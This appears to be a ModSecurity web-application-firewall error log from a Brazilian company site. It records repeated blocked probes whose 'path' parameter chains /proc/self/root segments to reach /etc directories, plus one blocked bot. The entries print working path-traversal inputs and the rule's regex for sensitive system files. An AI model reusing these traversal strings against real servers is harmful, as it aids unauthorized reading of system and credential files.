[Mon Mar 16 12:36:10.161541 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.241.46:48000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjahXjF1vJNtV6CWr0ygAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:11.386639 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:48012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgja46lpbStxTqkSktrUwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:12.686332 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.241.46:48024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjbHjZBu2q05ozVU9W_wAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:13.847853 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:48026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjbXjZBu2q05ozVU9XAQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:15.162071 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:48028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjb7ABkC4fWIHEf8HpdQAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:15.521091 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:35906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjb3jZBu2q05ozVU9XAwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:17.506822 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:48040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjcZqj1wV0Si-OkefsxgAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:18.764519 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.241.46:50992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjcnbQATo66fKoS7xOLgAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:19.903334 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:50998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjc_9ocpUE4ed4uDzuZwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:21.214757 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.241.46:51010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjdRXjF1vJNtV6CWr0zgAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:22.370359 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:51012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjdrysWC90G-1nBrBEQQAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:23.567571 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:51026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjd3bQATo66fKoS7xOMQAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:24.834930 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.241.46:51042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjeHjZBu2q05ozVU9XBwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:25.992772 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:51056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjebABkC4fWIHEf8HpdwAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:28.477528 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:51072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgje46lpbStxTqkSktrVwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:29.828386 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.241.46:60932] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjfXbQATo66fKoS7xONgAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:31.903105 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:60938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjf9SswJuvopo3lOhdkQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:33.196940 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:60952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjgbABkC4fWIHEf8HpewAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:34.595052 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:60968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjgo6lpbStxTqkSktrWQAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:35.930819 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.241.46:60976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjgxXjF1vJNtV6CWr00wAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:37.245804 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.241.46:60986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjhRXjF1vJNtV6CWr01AAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:38.563567 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.241.46:57276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjhpqj1wV0Si-OkefsygAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:39.858666 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.228.16:37040] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgjh_9ocpUE4ed4uDzuagAAAgQ"]
[Mon Mar 16 12:36:39.867941 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:57280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjh9SswJuvopo3lOhdmQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
